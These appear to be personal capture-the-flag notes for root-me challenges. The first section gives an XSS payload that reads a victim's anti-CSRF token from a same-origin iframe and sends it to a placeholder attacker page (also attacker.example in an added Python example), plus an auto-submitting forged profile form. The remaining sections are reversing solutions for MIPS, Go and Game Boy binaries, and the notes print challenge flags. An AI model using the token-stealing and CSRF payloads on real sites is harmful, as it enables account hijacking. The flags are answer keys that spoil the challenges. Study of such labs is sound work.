I decided to start getting into the habit of taking notes after this tragedy happened (Thanks @reznok!!!!)
Again, this is a note so that in case root-me gets fucked up again, I can easily get all my flags and solutions back. THIS IS NOT A WRITE UP.
First, we steal the anti-CSRF token with the XSS: an iframe loads the profile page in the victim's session, and because it is same-origin, the token in its form can be read out and passed along.
{% code title="steal_token.js" %}
<iframe id="iframe" src="/web-client/ch23/?action=profile" onload="read()"></iframe>
<script>
// The iframe is same-origin, so the profile page loaded with the victim's session is readable.
function read()
{
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
// Hand the token to the CSRF page below through the query string it parses ("?token=...").
// ATTACKER_CSRF_PAGE is a placeholder: the note does not record where that page was hosted.
document.location = "ATTACKER_CSRF_PAGE?token=" + encodeURIComponent(token);
}
</script>
{% endcode %}
Second, we create a CSRF page that takes the token from its query string and submits the forged request:
{% code title="csrf.html" %}
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>
// Copy ?token=... from the query string (put there by steal_token.js) into the hidden field.
function get(name){
if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
document.getElementById("token").value = decodeURIComponent(name[1]);
}
</script>
<!-- Same fields as the real profile form; only the token has to be filled in at runtime. -->
<form id="csrf" action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="tuanlinh1" />
<input type="hidden" name="status" value="on" />
<input id="token" name="token" value="" />
<input type="submit" value="Submit request" />
<script>get('token')</script>
<script>document.getElementById("csrf").submit()</script>
</form>
</body>
</html>
{% endcode %}
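The whole chain (token read, token-carrying redirect, query-string recovery, forged multipart POST) as plain Python functions, added here as an example and not part of the original note. Nothing contacts root-me: the profile HTML, the attacker URL (`ATTACKER_CSRF_PAGE`) and the multipart boundary are constructed stand-ins, and the token extraction works on raw HTML instead of the DOM.

```python
"""Added example (not the note's own code): the two halves of the XSS -> CSRF
chain as functions that run offline. All inputs below are constructed."""
import re
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

# Constructed stand-in for the profile form the iframe loads in the victim's session.
SAMPLE_PROFILE_HTML = """
<form method="POST" action="/web-client/ch23/?action=profile" enctype="multipart/form-data">
  <input type="text" name="username" value="admin">
  <input type="checkbox" name="status" checked>
  <input type="hidden" name="token" value="d41d8cd98f00b204">
  <input type="submit" value="Update">
</form>
"""

# Assumed placeholder for wherever csrf.html is hosted; not a value from the challenge.
ATTACKER_CSRF_PAGE = "http://attacker.example/csrf.html"

TOKEN_RE = re.compile(r'<input[^>]*name="token"[^>]*value="([^"]*)"', re.I)


def extract_token(html: str) -> Optional[str]:
    """What read() does through the DOM (forms[0].token.value), done on raw HTML."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def build_redirect(csrf_page: str, token: str) -> str:
    """The navigation read() performs: hand the token to the CSRF page as ?token=..."""
    return f"{csrf_page}?token={quote(token, safe='')}"


def query_param(url: str, name: str) -> Optional[str]:
    """Equivalent of get(name) in csrf.html: recover one parameter from the query string."""
    values = parse_qs(urlsplit(url).query).get(name)
    return values[0] if values else None


def multipart_body(fields: dict, boundary: str) -> bytes:
    """The body the auto-submitted multipart/form-data form sends (fixed boundary for determinism)."""
    parts = []
    for name, value in fields.items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


def run_chain(profile_html: str, csrf_page: str) -> dict:
    """Token read -> redirect -> query parse -> forged POST body, end to end."""
    token = extract_token(profile_html)
    if token is None:
        raise ValueError("no token in profile form")
    redirect = build_redirect(csrf_page, token)
    recovered = query_param(redirect, "token")
    body = multipart_body(
        {"username": "tuanlinh1", "status": "on", "token": recovered}, "----boundary"
    )
    return {"token": token, "redirect": redirect, "recovered": recovered, "body": body}


if __name__ == "__main__":
    result = run_chain(SAMPLE_PROFILE_HTML, ATTACKER_CSRF_PAGE)
    print(result["redirect"])
    print(result["body"].decode())
```

The point worth keeping in mind is the last function: a per-session token only stops a cross-origin attacker, and the same-origin script injected by the XSS reads it as easily as the legitimate form does.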
Reverse it and slow it down using Audacity:
{% file src=".gitbook/assets/out_flag.mp3" %}
{% code title="flag" %}
3b27641fc5h0
{% endcode %}
This challenge is quite easy, but it seems people hate MIPS, so there are not many solves. It's actually the easiest assembly to read/write so far, as far as I know and have tried.
First, the program reads input from stdin through fgets() and checks whether the input string length equals 19.
If len(input_string) != 19, it goes to the bad boy; otherwise the program keeps running.
Next is a for loop that checks whether ($fp + -0x58 + 4 + i) == 'i' for i in range(8, 17), i.e. i = 8 to 16.
Which means:
{% code %}
>>> hex(-0x58+4+8)
'-0x4c'
>>> hex(-0x58+4+9)
'-0x4b'
>>> hex(-0x58+4+10)
'-0x4a'
>>> hex(-0x58+4+11)
'-0x49'
>>> hex(-0x58+4+12)
'-0x48'
>>> hex(-0x58+4+13)
'-0x47'
>>> hex(-0x58+4+14)
'-0x46'
>>> hex(-0x58+4+15)
'-0x45'
>>> hex(-0x58+4+16)
'-0x44'
>>> hex(-0x58+4+17)
'-0x43'
{% endcode %}
So the bytes at offsets -0x4C through -0x44 (nine of them) must equal 'i'; -0x43 is where the loop stops (i == 17), and that byte is covered by the fixed checks below.
Next is an if statement that checks whether fixed frame offsets hold the characters it wants, which means:
var_4F = var_50 + 3 = "u" (this byte is checked relative to var_50: 'r' + 3 = 'u')
var_50 = "r"
var_51 = "t"
var_53 = "a"
var_54 = "c"
var_4E = "n"
var_52 = "n"
var_4D = "m"
var_43 = "p"
var_42 = "s"
Now we can build a string from the bytes at -0x54 through -0x42 (19 bytes, matching the length check), which is also the flag:
{% code title="flag" %}
cantrunmiiiiiiiiips
{% endcode %}
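The same reconstruction done by code, added as an example (not part of the original note): every check is recorded by its frame offset, translated to a buffer index with the base $fp - 0x54, and the result is re-checked the way the binary does (length, the 'i' loop, the fixed bytes and the var_4F == var_50 + 3 relation). The offsets and characters are the ones listed above; nothing else is assumed.

```python
"""Added example (not the note's own code): rebuild the 19-byte input from the
frame-relative checks above and re-check it the way the binary does."""

BUF_BASE = -0x54   # first byte of the input buffer: $fp + -0x58 + 4
LENGTH = 19        # the fgets() result must be exactly this long

# Fixed single-byte checks, keyed by frame offset (var_XX means $fp - 0xXX).
FIXED = {
    -0x54: "c",
    -0x53: "a",
    -0x52: "n",
    -0x51: "t",
    -0x50: "r",
    -0x4E: "n",
    -0x4D: "m",
    -0x43: "p",
    -0x42: "s",
}
# Relative check: var_4F == var_50 + 3 (target offset -> (source offset, delta)).
RELATIVE = {-0x4F: (-0x50, 3)}
# Loop: for i in range(8, 17): buffer[i] == 'i'
LOOP_RANGE = range(8, 17)
LOOP_CHAR = "i"


def offset_to_index(offset: int) -> int:
    """Frame offset -> index into the input buffer."""
    return offset - BUF_BASE


def build_flag() -> str:
    """Fill the buffer from the constraints; fail loudly if a byte is left unconstrained."""
    buf = [None] * LENGTH
    for off, ch in FIXED.items():
        buf[offset_to_index(off)] = ch
    for i in LOOP_RANGE:
        buf[i] = LOOP_CHAR
    for off, (src, delta) in RELATIVE.items():
        buf[offset_to_index(off)] = chr(ord(buf[offset_to_index(src)]) + delta)
    if None in buf:
        raise ValueError("unconstrained byte at index %d" % buf.index(None))
    return "".join(buf)


def check(s: str) -> bool:
    """Mirror of the binary's checks: length, loop of 'i', fixed bytes, relative byte."""
    if len(s) != LENGTH:
        return False
    if any(s[i] != LOOP_CHAR for i in LOOP_RANGE):
        return False
    if any(s[offset_to_index(off)] != ch for off, ch in FIXED.items()):
        return False
    return all(
        ord(s[offset_to_index(off)]) == ord(s[offset_to_index(src)]) + delta
        for off, (src, delta) in RELATIVE.items()
    )


if __name__ == "__main__":
    flag = build_flag()
    print(flag, len(flag), check(flag))
```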
Configure IDA:
Thank god this is not a stripped binary:
Find main_main():
First, there is a loop that XORs your input string with "rootme" and then compares the result with a hardcoded byte array.
Debug to find which byte array it compares with:
{% code title="solver.py" %}
# Bytes the loop compares against, copied out of the debugger.
ida_chars = [
    0x3B, 0x02, 0x23, 0x1B, 0x1B, 0x0C, 0x1C, 0x08, 0x28, 0x1B,
    0x21, 0x04, 0x1C, 0x0B
]
key = 'rootme'
out = ""
# XOR is its own inverse: re-applying the repeating key to the stored bytes gives the input back.
for i in range(len(ida_chars)):
    out += chr(ord(key[i % len(key)]) ^ ida_chars[i])
print(out)
print(len(out))
{% endcode %}
{% code title="flag" %}
ImLovingGoLand
{% endcode %}
First things first.
This file is a Game Boy ROM, and there are some interesting strings:
For debugging Game Boy ROMs, I chose BGB (http://bgb.bircd.org/)
Basically, this is a game where you can move RIGHT, LEFT, UP, DOWN and hit Enter to check; if you satisfy some requirements, it prints the flag.
Let's load it into IDA (IDA > CPU = Zilog Z80 > press C to force disassembly). The Game Boy CPU (Sharp SM83) is only a Z80 relative, so a few opcodes (e.g. 0x22 is LD (HL+),A on the Game Boy but LD (nn),HL on a Z80) decode wrongly under the Z80 module; cross-check with BGB's own disassembly when something looks odd:
Since I don't know where to start, I start with the strings and look for their xrefs:
0x042D = Right
0x0434 = Left
0x043E = Down
0x0444 = Yeah!
0x044C = Flag is
0x0459 = Nope
From 0x044C ("Flag is"), we can find good_boy.
Tracing back from good_boy, we find there are 4 checkpoints:
Each takes the value at memory [0xC0B0] and compares it with 0x32; if equal, it jumps to the next good_boy check.
Tracing xrefs to 0xC0B0, we find:
We already know 0x042D is "Right". These asm lines just print "Right", decrement the value at [0xC0B0] by 1, and do something with the value at [0xC0B4], which I believe is the FLAG (look back at good_boy).
Doing the same with the other checkpoints, we learn that when you press a key:
RIGHT => [0xC0B0] - 1
LEFT => [0xC0B1] - 1
UP => [0xC0B2] - 1
DOWN => [0xC0B3] - 1
and then it does something with the value at [0xC0B4] (flag).
Then it checks whether all of the constraints below hold, and if so prints the flag:
[0xC0B0] == 0x32
[0xC0B1] == 0x30
[0xC0B2] == 0x37
[0xC0B3] == 0x38
Now we need to know the initial values, so it's time to debug with BGB:
The initial values are:
[0xC0B0] == 0x39
[0xC0B1] == 0x39
[0xC0B2] == 0x39
[0xC0B3] == 0x39
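A small simulation of the four counters, added as an example and not part of the original note: it models each key press as an 8-bit decrement of the counter at the address listed above (DEC on the Game Boy wraps at 0), derives how many presses of each key move the counter from 0x39 to its good_boy value, and replays them to confirm the four compares pass. The update of the flag byte at [0xC0B4] is not modelled, since the note does not describe it.

```python
"""Added example (not the note's own code): simulate the press counters from the
checkpoints above. Addresses and values are the ones recorded in the note."""

INITIAL = {0xC0B0: 0x39, 0xC0B1: 0x39, 0xC0B2: 0x39, 0xC0B3: 0x39}
TARGET = {0xC0B0: 0x32, 0xC0B1: 0x30, 0xC0B2: 0x37, 0xC0B3: 0x38}
KEY_TO_ADDR = {"RIGHT": 0xC0B0, "LEFT": 0xC0B1, "UP": 0xC0B2, "DOWN": 0xC0B3}


def press(mem: dict, key: str) -> None:
    """One key press: 8-bit decrement of that key's counter (wraps like DEC on the Game Boy CPU)."""
    addr = KEY_TO_ADDR[key]
    mem[addr] = (mem[addr] - 1) & 0xFF


def good_boy(mem: dict) -> bool:
    """The four checkpoint compares that gate the 'Flag is' path."""
    return all(mem[addr] == value for addr, value in TARGET.items())


def presses_needed() -> dict:
    """Presses per key: (initial - target) mod 256, because the counter only ever decrements."""
    return {key: (INITIAL[addr] - TARGET[addr]) & 0xFF for key, addr in KEY_TO_ADDR.items()}


def solve() -> tuple:
    """Replay the computed presses on a fresh memory image and report whether good_boy holds."""
    mem = dict(INITIAL)
    plan = presses_needed()
    for key, count in plan.items():
        for _ in range(count):
            press(mem, key)
    return plan, good_boy(mem)


if __name__ == "__main__":
    plan, ok = solve()
    print(plan, ok)
```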
Time to get the flag:
{% code title="flag" %}
rom1
{% endcode %}